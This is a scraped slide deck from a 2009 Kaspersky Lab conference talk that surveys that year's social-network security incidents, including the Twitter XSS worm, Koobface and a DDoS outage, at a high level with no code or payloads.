Se ha denunciado esta presentación.
Utilizamos tu perfil de LinkedIn y tus datos de actividad para personalizar los anuncios y mostrarte publicidad más relevante. Puedes cambiar tus preferencias de publicidad en cualquier momento.

Today’s hidden dangers: Social networks under attack

A timeline of security incidents on social networks in 2009.

  • Sé el primero en comentar

Today’s hidden dangers: Social networks under attack

  1. Click to edit Master title style • Click to edit Master text styles – Second level • Third level – Fourth level » Fifth level June 10th, 2009 Event details (title, place) Today’s hidden dangers: Social networks under attack Ștefan Tănase Senior Regional Researcher Kaspersky Lab EEMEA Webstock 2009 – Bucharest, Romania - 18 September 2009
  2. Click to edit Master title style • Click to edit Master text styles – Second level • Third level – Fourth level » Fifth level June 10th, 2009 Event details (title, place) • Do you believe in superstitions? I don’t. • 911 - emergency phone number • Today: • 18 September 2009, 18.09.2009, 18.09.09, 18.9.9 • 1 + 8 = 9 • Today’s presentation: • 11 security incidents that changed the social networking world in 2009. 11 and 09. • Social networks: 911 Overview 18 September 2009 Webstock 2009
  3. Click to edit Master title style • Click to edit Master text styles – Second level • Third level – Fourth level » Fifth level June 10th, 2009 Event details (title, place) LinkedIn – just a starter 18 September 2009 Webstock 2009 • Massive malware campaign starts targeting LinkedIn • Why LinkedIn? Beacause it worked! • Blackhat SEO • By googling for “Jessica Alba naked” or “Keri Russell nude” the user would find the malicious profiles indexed • Top 5 in SERPS • January 2009 - Bogus LinkedIn profiles serving malware
  4. Click to edit Master title style • Click to edit Master text styles – Second level • Third level – Fourth level » Fifth level June 10th, 2009 Event details (title, place) • February 2009 – First commercial Twitter spamming tool • Tweettornado.com - “fully automated advertising software for Twitter” • Was empowering phishers, spammers, malware authors and everyone with the ability to generate unlimited Twitter accounts • Features: add unlimited number of followers, automatically update all accounts through proxy servers with identical messages Twitter spam gets automated 18 September 2009 Webstock 2009
  5. Click to edit Master title style • Click to edit Master text styles – Second level • Third level – Fourth level » Fifth level June 10th, 2009 Event details (title, place) • April 2009 – Twitter gets hit by XSS worm • Multiple variants of the worm were identified • Thousands of spam messages containing the word "Mikeyy“ filled the timeline • Proof of concept – no malicious intent • Author got a job at a web security company Comeback of the XSS worm 18 September 2009 Webstock 2009
  6. Click to edit Master title style • Click to edit Master text styles – Second level • Third level – Fourth level » Fifth level June 10th, 2009 Event details (title, place) Comeback of the XSS worm 18 September 2009 Webstock 2009
  7. Click to edit Master title style • Click to edit Master text styles – Second level • Third level – Fourth level » Fifth level June 10th, 2009 Event details (title, place) Social engineering at its best 18 September 2009 Webstock 2009 • Public information posted to social networks by twitter admin • Used by French hacker in social engineering attack • To answer Yahoo! Mail security question and reset the password • “Wow - my Yahoo mail account was just hacked.“ • “If anyone with Yahoo! Security is out there, hit me up with an reply“ • April 2009 – Twitter admin panel gets hacked
  8. Click to edit Master title style • Click to edit Master text styles – Second level • Third level – Fourth level » Fifth level June 10th, 2009 Event details (title, place) • May 2009 – Harvesting email addresses in real time • Why search for emails when you can get fresh ones in real time? • http://search.twitter.com/ is the answer! • Simple, but effective search queries: • “email me at” + “yahoo.com” • “contact me at” + “gmail.com” • Personalized attacks start happening What are you doing? Harvesting. 18 September 2009 Webstock 2009
  9. Click to edit Master title style • Click to edit Master text styles – Second level • Third level – Fourth level » Fifth level June 10th, 2009 Event details (title, place) Trendy malware 18 September 2009 Webstock 2009 • June 2009 – Trending topics start being exploited
  10. Click to edit Master title style • Click to edit Master text styles – Second level • Third level – Fourth level » Fifth level June 10th, 2009 Event details (title, place) Short URLs, big problems 18 September 2009 Webstock 2009 • The best things about short URLs • There are so many! • Problems with short URLs: • Social engineering is easy • Questionable reliability • Implicit trust • Cli.gs gets hacked, no malicious intent – but what if? • Too many redirects hosted in the same place is not good news • June 2009 – URL shortening service Cli.gs gets hacked
  11. Click to edit Master title style • Click to edit Master text styles – Second level • Third level – Fourth level » Fifth level June 10th, 2009 Event details (title, place) • June 2009 – Guy Kawasaki's Twitter account hijacked • Of course, it was used to push malware. • Both Windows and Mac malware. • 140,000 Twitter users were potential victims. • The hook? “sex tape video free download” Follow me! Me me me! 18 September 2009 Webstock 2009
  12. Click to edit Master title style • Click to edit Master text styles – Second level • Third level – Fourth level » Fifth level June 10th, 2009 Event details (title, place) The web 2.0 worm 18 September 2009 Webstock 2009 • June 2009 – Explosive growth of Koobface modifications • The number of variants detected jumped from 324 at the end of May to almost 1000 by the end of June 2009 • This sign of increased cybercriminal activity involving social networks in the past months proves that the strategies being used by the bad guys to infect users are much more efficient when adding the social context to the attacks
  13. Click to edit Master title style • Click to edit Master text styles – Second level • Third level – Fourth level » Fifth level June 10th, 2009 Event details (title, place) The web 2.0 worm 18 September 2009 Webstock 2009
  14. Click to edit Master title style • Click to edit Master text styles – Second level • Third level – Fourth level » Fifth level June 10th, 2009 Event details (title, place) Koobface on the tweet 18 September 2009 Webstock 2009 • June 2009 – Koobface spreading through Twitter also • First discovered one year ago by Kaspersky Lab, Koobface was only targeting Facebook and MySpace users • Being constantly “improved”, now spreading through more social networks: Facebook, MySpace, Hi5, Bebo, Tagged, Netlog and most recently… Twitter
  15. Click to edit Master title style • Click to edit Master text styles – Second level • Third level – Fourth level » Fifth level June 10th, 2009 Event details (title, place) One bird and two stones 18 September 2009 Webstock 2009 • August 2009 – Twitter knocked offline by DDoS attack • The morning of August 6th - Twitter gets hit for an extended period of time • Rumors they are facing a massive distributed denial-of-service attack • Twitter confirmed the outage in a brief status message • Service was restored gradually, first in the US, then the rest of the world • Problems with the API lasted several days
  16. Click to edit Master title style • Click to edit Master text styles – Second level • Third level – Fourth level » Fifth level June 10th, 2009 Event details (title, place) That’s it? 18 September 2009 Webstock 2009
  17. Click to edit Master title style • Click to edit Master text styles – Second level • Third level – Fourth level » Fifth level June 10th, 2009 Event details (title, place) What’s next? 18 September 2009 Webstock 2009 • It is just the beginning • Attack techniques exploiting social networks will continue to grow • Social networks will open up new ways for targeted attacks against individuals • It will be very hard for social networks to do better: their business means usability, not security • Be careful out there!
  18. Click to edit Master title style • Click to edit Master text styles – Second level • Third level – Fourth level » Fifth level June 10th, 2009 Event details (title, place) Thank you! stefant@kaspersky.ro twitter.com/stefant Ștefan Tănase Webstock 2009 - Bucharest, Romania - 18 September 2009 Senior Regional Researcher Kaspersky Lab EEMEA

×